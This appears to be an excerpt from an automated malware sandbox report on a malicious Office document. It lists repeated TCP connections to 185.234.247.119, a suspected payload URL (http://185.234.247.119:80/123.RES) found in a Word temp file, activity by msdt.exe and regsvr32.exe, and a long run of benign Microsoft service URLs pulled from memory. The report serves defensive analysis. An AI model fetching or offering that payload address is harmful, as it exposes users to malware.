                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: ~WRS{677538CC-22A1-43D9-BD9A-C629280F1C4E}.tmp.0.drString found in binary or memory: http://185.234.247.119:80/123.RES
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
                            Source: msdt.exe, 00000007.00000002.713967957.0000000005990000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
                            Source: regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: explorer.exe, 00000021.00000003.677304692.00000000050E4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/Nhttp://www.borland.com/namespaces/Types
                            Source: explorer.exe, 00000021.00000003.677304692.00000000050E4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                            Source: regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/http
                            Source: regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                            Source: regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/mime/
                            Source: regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap/
                            Source: explorer.exe, 00000021.00000003.677304692.00000000050E4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap/#
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
                            Source: regsvr32.exe, 0000001C.00000002.672872094.0000000000867000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Types
                            Source: regsvr32.exe, 00000026.00000002.713602734.0000000002F30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Types-IWSDLPublish
                            Source: explorer.exe, 00000021.00000003.677304692.00000000050E4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.borland.com/namespaces/TypesU
                            Source: explorer.exe, 00000021.00000003.677304692.00000000050E4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.borland.com/namespaces/Typeshhttp://www.borland.com/namespaces/Types-IWSDLPublish
                            Source: regsvr32.exe, 0000001B.00000002.672627187.0000000002BD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Typesp
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.aadrm.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.aadrm.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.cortana.ai
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.diagnostics.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.microsoftstream.com/api/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.office.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.onedrive.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://apis.live.net/v5.0/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://augloop.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://augloop.office.com/v2
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://cdn.entity.
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://clients.config.office.net/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://config.edge.skype.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://cortana.ai
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://cortana.ai/api
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://cr.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://dataservice.o365filtering.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://dataservice.o365filtering.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://dev.cortana.ai
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://devnull.onenote.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://directory.services.
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://graph.ppe.windows.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://graph.ppe.windows.net/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://graph.windows.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://graph.windows.net/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://incidents.diagnostics.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://invites.office.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://lifecycle.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://login.microsoftonline.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://login.windows.local
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://management.azure.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://management.azure.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://messaging.engagement.office.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://messaging.office.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://ncus.contentsync.
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://ncus.pagecontentsync.
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://officeapps.live.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://onedrive.live.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://onedrive.live.com/embed?
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://osi.office.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://otelrules.azureedge.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://outlook.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://outlook.office.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://outlook.office365.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://outlook.office365.com/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://pages.store.office.com/review/query
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://powerlift.acompli.net
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://roaming.edog.
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://settings.outlook.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://shell.suite.office.com:1443
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://skyapi.live.net/Activity/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://staging.cortana.ai
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://store.office.cn/addinstemplate
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://store.office.de/addinstemplate
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
